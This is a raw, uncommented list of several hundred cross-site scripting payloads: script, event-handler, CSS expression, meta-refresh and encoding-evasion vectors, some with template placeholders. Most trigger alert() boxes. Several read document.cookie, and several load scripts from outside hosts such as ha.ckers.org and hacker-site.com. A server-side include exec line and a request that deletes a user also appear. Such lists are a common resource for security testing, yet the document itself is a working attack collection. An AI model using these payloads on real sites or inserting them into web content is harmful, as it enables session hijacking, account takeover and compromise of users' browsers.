<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)`
attributename=`innerhtml`
to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)
attributename=innerhtml
values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%
(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute
href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0
to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);"
folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss"
datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-
event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t"
implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x"
to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<XSS STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image:
url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss"
implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML
ID="xss"><I><B><IMG SRC="javas<!--
-->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><
br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/
script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</
html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG
SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="javAascript:javascript:alert(1)">test1</a>
<a href="javaascript:javascript:alert(1)">test1</a>
<embed width=500 height=500
code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe
srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascr
ipt:alert(1)&gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG
SRC=javascript:ale&#
114;t('XSS')>
<IMG
SRC=javascrip
t:alert('�
00088SS')>
<IMG
SRC=javascript:alert&
#x28'XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe src="	javascript:prompt(1)	">
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=``
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X<
/a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!--	> alert (1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/
type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
</script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r&
Tab;t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \
u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/
javascript,ale�
00072;t(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,<script src=&#
34http://sternefami&#
108y.net/foo.js"></sc
ript>​">Click Me</a>
'';!--"<XSS>=&{()}
'>//\\,<'>">">"*"
'); alert('XSS
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
<body onunload="javascript:alert('XSS');">
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<div style="x:expression((window.r==1)?'':eval('r=1;
alert(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script>
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
">/XaDoS/><script>alert(document.cookie)</script><script
src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
src="http://www.site.com/XSS.js"></script>
data:text/html;charset=utf-
7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!--" /><script>alert('xss');</script>
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by
xss</h1></marquee>
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by
xss</h1></marquee>
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
http://www.simpatie.ro/index.php?
page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags"
onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\
u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\
u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\
u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\
u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\
u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\
u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\
u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\
u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\
u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\
u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\
u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\
u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\
u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\
u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\
u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\
u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\
u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\
u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\
u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\
u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\
u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\
u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\
u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\
u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\
u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\
u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\
u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\
u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\
u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\
u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\
u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\
u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\
u0066\u0072\u0061\u006d\u0065\u003e');"></img>
</body>
</html>
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<SCRIPT> alert(“XSS”); </SCRIPT>
<BODY ONLOAD=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG SRC="javascript:alert('XSS');">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IFRAME SRC=”http://hacker-site.com/xss.html”>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<TABLE BACKGROUND="javascript:alert('XSS')">
